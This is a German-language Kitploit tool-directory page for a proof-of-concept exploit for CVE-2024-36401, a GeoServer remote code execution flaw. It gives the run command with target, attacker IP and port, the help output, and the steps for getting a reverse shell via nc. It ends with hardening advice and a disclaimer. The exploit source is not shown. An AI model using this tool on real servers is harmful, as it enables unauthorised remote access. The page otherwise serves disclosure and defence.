Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36401 — POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets. | Kitploit
Tools/GitHubGitHub/bigb0x/cve-2024-36401
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.

Repository anzeigen
3415vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE für CVE-2024-36401

POC für CVE-2024-36401 GeoServer. Dieser POC versucht, eine Reverse-System-Shell von den Zielen herzustellen.

Banner

Überblick

POC für CVE-2024-36401: RCE für GeoServer-Versionen vor 2.25.1, 2.24.3 und 2.23.5 von GeoServer. Dieser POC basiert auf der Sicherheitswarnung von phith0n.

Funktionsweise

  1. Richtet einen Listener auf Ihrem Rechner für die eingehende Reverse-Shell vom Ziel ein.
  2. Dieser POC sendet eine POST-Anfrage mit den Payloads.
  3. Versucht, eine Shell auf dem Zielserver zu etablieren.
  4. Diese Technik setzt voraus, dass nc auf dem Ziel installiert ist.

Verwendung

Dieser POC versucht, eine Reverse-Shell von den verwundbaren Zielen herzustellen. Er soll gegen verwundbare Linux-Ziele funktionieren. Sie benötigen einen Rechner mit einer veröffentlichten und erreichbaren IP, um diesen POC auszuführen.

Mindestanforderungen

  • Python 3.6 oder höher
  • requests-Bibliothek

Um diesen POC gegen ein einzelnes Ziel zu verwenden:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Hilfe:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

So schützen Sie Ihre GeoServer-Appliance

  1. Deaktivieren Sie WFS-Anfragen.

  2. Sichern Sie Ihr Linux, indem Sie iptables so konfigurieren, dass Reverse-Verbindungen deaktiviert werden, Standardrichtlinien auf Verwerfen des gesamten Datenverkehrs setzen, etablierte und zugehörige Verbindungen zulassen und nur essenziellen ausgehenden Verkehr wie DNS, HTTP und HTTPS erlauben.

  3. Oder aktualisieren Sie auf die neueste Version von GeoServer.

Kontakt

Bei Vorschlägen oder Gedanken wenden Sie sich bitte an mich.

Haftungsausschluss

Ich erstelle meine eigenen Tools gerne nur zum Spaß, für die Arbeit und zu Bildungszwecken. Ich unterstütze oder fördere kein Hacking oder unbefugten Zugriff auf Systeme oder Netzwerke. Bitte verwenden Sie meine Tools verantwortungsbewusst und nur auf Systemen, für die Sie eine klare Erlaubnis zum Testen haben.

Tool herunterladen